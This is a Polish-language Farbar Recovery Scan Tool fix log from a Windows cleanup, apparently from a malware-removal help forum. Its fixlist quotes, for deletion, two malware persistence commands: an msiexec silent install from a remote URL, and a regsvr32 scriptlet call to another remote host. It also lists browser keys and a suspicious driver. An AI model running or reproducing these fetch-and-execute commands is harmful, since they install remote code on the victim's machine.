Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 30-04-2017 Uruchomiony przez Toshiba (30-04-2017 19:05:54) Run:1 Uruchomiony z C:\Users\Toshiba\Desktop\Programy Załadowane profile: Toshiba (Dostępne profile: Toshiba) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-2717061265-649508285-3199829881-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== /q IFEO\taskmgr.exe: [Debugger] ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku U3 awldyuog; C:\Users\Toshiba\AppData\Local\Temp\awldyuog.sys [56584 2017-04-30] (GMER) [Brak podpisu cyfrowego] <==== UWAGA S4 sptd2; System32\Drivers\sptd2.sys [X] Task: {1C4C77C9-1292-4908-8435-57EA5763DEFD} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkPDN8MjUcEeqxMWLdw2FxGdY1NWJaMWLlEjH4ZH== scrobj.dll DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Toshiba\AppData\Local\Mozilla C:\Users\Toshiba\AppData\Roaming\Mozilla C:\Users\Toshiba\AppData\Roaming\Profiles EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-2717061265-649508285-3199829881-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => klucz pomyślnie usunięto HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono. awldyuog => serwis nie znaleziono. HKLM\System\CurrentControlSet\Services\sptd2 => klucz pomyślnie usunięto sptd2 => serwis pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1C4C77C9-1292-4908-8435-57EA5763DEFD} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1C4C77C9-1292-4908-8435-57EA5763DEFD} => klucz pomyślnie usunięto C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => klucz pomyślnie usunięto HKCU\Software\Mozilla => klucz nie znaleziono. HKCU\Software\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\MozillaPlugins => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\MozillaPlugins => klucz pomyślnie usunięto "C:\Users\Toshiba\AppData\Local\Mozilla" => nie znaleziono. C:\Users\Toshiba\AppData\Roaming\Mozilla => pomyślnie przeniesiono "C:\Users\Toshiba\AppData\Roaming\Profiles" => nie znaleziono. =========== EmptyTemp: ========== BITS transfer queue => 2787168 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 306547274 B Java, Flash, Steam htmlcache => 506 B Windows/system/drivers => 110673558 B Edge => 283 B Chrome => 620923298 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 161 B systemprofile32 => 128 B LocalService => 24708 B NetworkService => -658 B Toshiba => 193482818 B RecycleBin => 0 B EmptyTemp: => 1.1 GB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 19:06:25 ====